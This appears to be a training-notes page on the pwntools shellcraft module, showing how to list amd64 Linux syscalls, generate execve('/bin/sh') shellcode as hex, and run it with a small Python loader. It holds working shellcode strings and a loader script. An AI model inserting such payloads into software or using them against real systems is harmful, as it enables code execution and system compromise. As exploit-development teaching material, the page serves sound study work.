SHELLCRAFT

This pwntool module helps exploit developers to quickly generate assembly code (shellcode) for common tasks, without having to write raw assembly by hand. It provides ready-made snippets for things like executing syscalls, spawning a shell, reading/writing files, or setting registers. The code can be output in multiple formats (assembly, raw bytes, or Python strings). It is architecture-aware and supports x86, x86-64, ARM, MIPS, and others. For example, shellcraft.sh() produces assembly for a simple execve("/bin/sh") shell, while shellcraft.cat("flag.txt") generates code to open, read, and print a file. Because it integrates tightly with Pwntools’ assembler (asm), you can seamlessly generate shellcode, assemble it, and inject it into an exploit. In short, shellcraft acts like a library of building blocks for custom payloads, making shellcode creation both faster and less error-prone.

COMPLETE X86_64 SYSCALL LIST

Logopwnlib.shellcraft.amd64 — Shellcode for AMD64 — pwntools 4.13.1 documentation

LISTING SYSCALLS

METHOD 1:

root@sre:~$ pwn shellcraft -l 'amd64.linux'
 ...SNIP...
 amd64.linux.sh

METHOD 2:

root@sre:~$ python3

>>> from pwn import *
>>> context(os="linux", arch="amd64", log_level="error")
>>> dir(shellcraft)

[...SNIP... 'execve', 'exit', 'exit_group', ... SNIP...]

SHELLCODE GENERATION: BASIC

root@sre:~$ pwn shellcraft amd64.linux.sh
 6a6848b82f62696e2f2f2f73504889e768726901018134240101010131f6566a085e4801e6564889e631d26a3b580f05
 
 * this shellcode is not as optimized and short as a manually generated shellcode

SHELLCODE GENERATION: ADVANCED (VIA PYTHON)

This method uses the Python3 interpreter to fully unlock shellcraft's capabilities and use its advanced syscalls with arguments.

root@sre:~$ python3
 >>> from pwn import *
 >>> context(os="linux", arch="amd64", log_level="error")
 >>> dir(shellcraft)

 [...SNIP... 'execve', 'exit', 'exit_group', ... SNIP...]
 >>> syscall = shellcraft.execve(path='/bin/sh',argv=['/bin/sh']) # syscall and args

 >>> asm(syscall).hex()                                        # print shellcode
  '48b801010101010101015048b82e63686f2e726901483104244889e748b801010101010101015048b82e63686f2e7269014831042431f6566a085e4801e6564889e631d26a3b580f05'
 
 * the dir(shellcraft) function is used to list all available syscalls

RUNNING SHELLCODE (TESTING)

METHOD 1

root@sre:~$ pwn shellcraft amd64.linux.sh -r
 $ whoami
  root

METHOD 2

root@sre:~$ nano loader.py
 #!/usr/bin/python3

 import sys
 from pwn import *

 context(os="linux", arch="amd64", log_level="error")

 run_shellcode(unhex(sys.argv[1])).interactive()

root@sre:~$ python3 loader.py '48b801010101010101015048b82e63686f2e726901483104244889e748b801010101010101015048b82e63686f2e7269014831042431f6566a085e4801e6564889e631d26a3b580f05'
 $ whoami
    root
PreviousSHELLCODINGNextENG

Last updated